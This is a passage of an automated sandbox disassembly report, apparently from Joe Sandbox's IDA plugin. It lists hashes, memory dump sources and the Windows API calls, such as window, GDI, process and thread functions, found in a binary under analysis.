                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                              • String ID:
                                                                              • API String ID: 4137160315-0
                                                                              • Opcode ID: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                              • Instruction ID: 1581b522c3ee05a339ffa1fd07f9e8cd23967deed6539873686ea33d82c69dd2
                                                                              • Opcode Fuzzy Hash: 9bf1d5af4d3523281d87c855d40d0150606dc562a9e0308dc2a2f88b36285eae
                                                                              • Instruction Fuzzy Hash: 7C31C1B2104306ABD310DF54CD85E6BB7E9FB98304F004A2EF94597281E675E9058BA6
                                                                              APIs
                                                                              • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044886C
                                                                              • EnableWindow.USER32(004A83D8,00000000), ref: 00448BAB
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448BC1
                                                                              • ShowWindow.USER32(004A83D8,00000000,004A83D8,?,?), ref: 00448C37
                                                                              • ShowWindow.USER32(004A83D8,00000004,004A83D8), ref: 00448C43
                                                                              • EnableWindow.USER32(004A83D8,00000001), ref: 00448C58
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Window$Enable$Show$MessageSend
                                                                              • String ID:
                                                                              • API String ID: 1871949834-0
                                                                              • Opcode ID: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                              • Instruction ID: fbfed122d4da650e42f877d7e8bff2bfe9b33138fa51555fe8345b8bcc16d821
                                                                              • Opcode Fuzzy Hash: 703f0702a5e3ae6889c0b2c4cbd553a5347372704319c0c884d711360b5070ea
                                                                              • Instruction Fuzzy Hash: A731F3B07443819BF7248E14C8C4BAFB7D0AB95345F08482EF981A63D1DBAC9846872A
                                                                              APIs
                                                                              • _memset.LIBCMT ref: 0044961A
                                                                              • SendMessageW.USER32 ref: 0044964A
                                                                                • Part of subcall function 00433A98: _wcspbrk.LIBCMT ref: 00433AAC
                                                                              • SendMessageW.USER32(?,00001074,?,00000001), ref: 004496AC
                                                                              • _wcslen.LIBCMT ref: 004496BA
                                                                              • _wcslen.LIBCMT ref: 004496C7
                                                                              • SendMessageW.USER32(?,00001074,?,?), ref: 004496FD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$_wcslen$_memset_wcspbrk
                                                                              • String ID:
                                                                              • API String ID: 1624073603-0
                                                                              • Opcode ID: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                              • Instruction ID: 7e49a266cf7116299f7bc8659d1ce07b00adedb8b3f1b428e1954e4b11147a1e
                                                                              • Opcode Fuzzy Hash: 3158986b153f08837b9b71a8f77f3cc169978b1c24ba43a32ffefb24081b9654
                                                                              • Instruction Fuzzy Hash: B631CA71508300AAE720DF15DC81BEBB7D4EBD4720F504A1FFA54862D0EBBAD945C7A6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                              • Instruction ID: 0263b137e1f68684b0dae4bb7f633391a2f723f0f4072b7ce39308acd6c8c458
                                                                              • Opcode Fuzzy Hash: 8dc28afdcb3e23db499faf1906c1cec9916ddd90de084288035f36419de8ba35
                                                                              • Instruction Fuzzy Hash: 31219272245110ABE7108B68DCC4B6F7798EB96374F240A3AF512C61E1EA7998C1C769
                                                                              APIs
                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004555AD
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: DestroyWindow$DeleteObject$IconMove
                                                                              • String ID:
                                                                              • API String ID: 1640429340-0
                                                                              • Opcode ID: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                              • Instruction ID: 2ee25f48dcb0ad8048bc4d9c922f6cac320a9d705fdb810e808868a6102f62dc
                                                                              • Opcode Fuzzy Hash: da39536b61dc90218e8938c0c8165bcff49a91d8f884d8405ba8ed69dafdd4fa
                                                                              • Instruction Fuzzy Hash: 05312770200A419FD724DF24C998B3A73F9FB44312F4485AAE945CB266E778EC49CB69
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: __fileno__setmode$DebugOutputString_fprintf
                                                                              • String ID:
                                                                              • API String ID: 3354276064-0
                                                                              • Opcode ID: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                              • Instruction ID: 1e9a75ed7ce68f0ee686932f25d41d1f14ae1a91d469003489e3a0780bce169f
                                                                              • Opcode Fuzzy Hash: 44da5cbe136b9a97bfd5e2050e6700f1212f0f901edc4668462b95a159366457
                                                                              • Instruction Fuzzy Hash: 6D11F3B2D0830136D500BA366C02AAF7A5C4A91B5CF44056EFD4563293EA2DAA4943FF
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteMenuObject$IconWindow
                                                                              • String ID:
                                                                              • API String ID: 752480666-0
                                                                              • Opcode ID: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                              • Instruction ID: bf467a0aa8f060071afd9cdae546a2eb92d9c059e8a57ac1e588bb5f3fc3a395
                                                                              • Opcode Fuzzy Hash: e2db828b4da75c1988a3618645d7ad87c2567147b1e4a2a373431826dce2281b
                                                                              • Instruction Fuzzy Hash: 26215E30200A019FC724DF24D5E8B7AB7A9FB44312F50855EED498B392CB39EC89CB59
                                                                              APIs
                                                                              • DestroyWindow.USER32(00000000), ref: 0045527A
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 0045528C
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                              • String ID:
                                                                              • API String ID: 3275902921-0
                                                                              • Opcode ID: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                              • Instruction ID: c357af2a313eda44c34a26cb015c973203dd8f66e4d80e74dc1abfaeb9ce60f9
                                                                              • Opcode Fuzzy Hash: 9ca718b8a23ef3076e20a4bf5a66fd8e296fb8dfd37af4e8726ba93a3cadf818
                                                                              • Instruction Fuzzy Hash: 2D217E70604A019BC714DF79D99466AB7A5BF44311F40856EF919CB342DB38E849CF68
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32(0000000A,?,?,?,?,?,00446540,?,?,?,?,?,?,?,?,?), ref: 0043935D
                                                                              • OpenProcessToken.ADVAPI32(00000000,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439364
                                                                              • CreateEnvironmentBlock.USERENV(?,?,00000001,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439376
                                                                              • CloseHandle.KERNEL32(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 00439383
                                                                              • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 004393C0
                                                                              • DestroyEnvironmentBlock.USERENV(?,?,00000000,00464227,00000000,?,?,?,?,?,?,?,?), ref: 004393D4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                              • String ID:
                                                                              • API String ID: 1413079979-0
                                                                              • Opcode ID: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                              • Instruction ID: 8c652321442b38080740e7d333ba663a52d3460857ef2618669649d87ea194c0
                                                                              • Opcode Fuzzy Hash: 1d720b0393062126ad9b64f1bf0a3b497d62ac8a089cd0237a290436ac7c4432
                                                                              • Instruction Fuzzy Hash: 7B2150B2208300ABD314CB65D854EABB7EDEBCD754F084E1DF989A3250C7B4E901CB25
                                                                              APIs
                                                                              • ___set_flsgetvalue.LIBCMT ref: 0041418F
                                                                              • __calloc_crt.LIBCMT ref: 0041419B
                                                                              • __getptd.LIBCMT ref: 004141A8
                                                                              • CreateThread.KERNEL32(?,?,004140DB,00000000,?,?), ref: 004141DF
                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,00000000), ref: 004141E9
                                                                              • __dosmaperr.LIBCMT ref: 00414201
                                                                                • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
                                                                              • String ID:
                                                                              • API String ID: 1803633139-0
                                                                              • Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                              • Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
                                                                              • Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
                                                                              • Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
                                                                              APIs
                                                                              • ImageList_Destroy.COMCTL32(?), ref: 004555E8
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                               • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                               • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                                                              • String ID:
                                                                              • API String ID: 3275902921-0
                                                                              • Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                              • Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
                                                                              • Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
                                                                              • Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
                                                                              APIs
                                                                              • SendMessageW.USER32 ref: 004554DF
                                                                              • SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
                                                                              • DeleteObject.GDI32(?), ref: 0045564E
                                                                              • DeleteObject.GDI32(?), ref: 0045565C
                                                                              • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                              • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: DeleteDestroyMessageObjectSend$IconWindow
                                                                              • String ID:
                                                                              • API String ID: 3691411573-0
                                                                              • Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                              • Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
                                                                              • Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
                                                                              • Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$_wcstok$ExtentPoint32Text
                                                                              • String ID:
                                                                              • API String ID: 1814673581-0
                                                                              • Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                              • Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
                                                                              • Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
                                                                              • Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
                                                                              APIs
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
                                                                              • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
                                                                              • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
                                                                              • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                              • String ID:
                                                                              • API String ID: 2833360925-0
                                                                              • Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                              • Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
                                                                              • Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
                                                                              • Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
                                                                              APIs
                                                                                • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
                                                                                • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
                                                                                • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
                                                                                • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
                                                                              • LineTo.GDI32(?,?,?), ref: 00447227
                                                                              • MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
                                                                              • LineTo.GDI32(?,?,?), ref: 0044723D
                                                                              • EndPath.GDI32(?), ref: 0044724E
                                                                              • StrokePath.GDI32(?), ref: 0044725C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
                                                                              • String ID:
                                                                              • API String ID: 372113273-0
                                                                              • Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                              • Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
                                                                              • Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
                                                                              • Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
                                                                              APIs
                                                                              • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
                                                                              • MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
                                                                              • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
                                                                              • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
                                                                              • MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
                                                                              • MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: Virtual
                                                                              • String ID:
                                                                              • API String ID: 4278518827-0
                                                                              • Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                              • Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
                                                                              • Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
                                                                              • Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
                                                                              APIs
                                                                              • GetDC.USER32(00000000), ref: 0044CBEF
                                                                              • GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
                                                                              • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
                                                                              • ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
                                                                              • MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
                                                                              • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1714098030.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.1714084653.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714148064.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714163795.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                              • Associated: 00000000.00000002.1714192392.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_r6lOHDg9N9.jbxd
                                                                              Similarity
                                                                              • API ID: CapsDevice$Release
                                                                              • String ID:
                                                                              • API String ID: 1035833867-0
                                                                              • Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
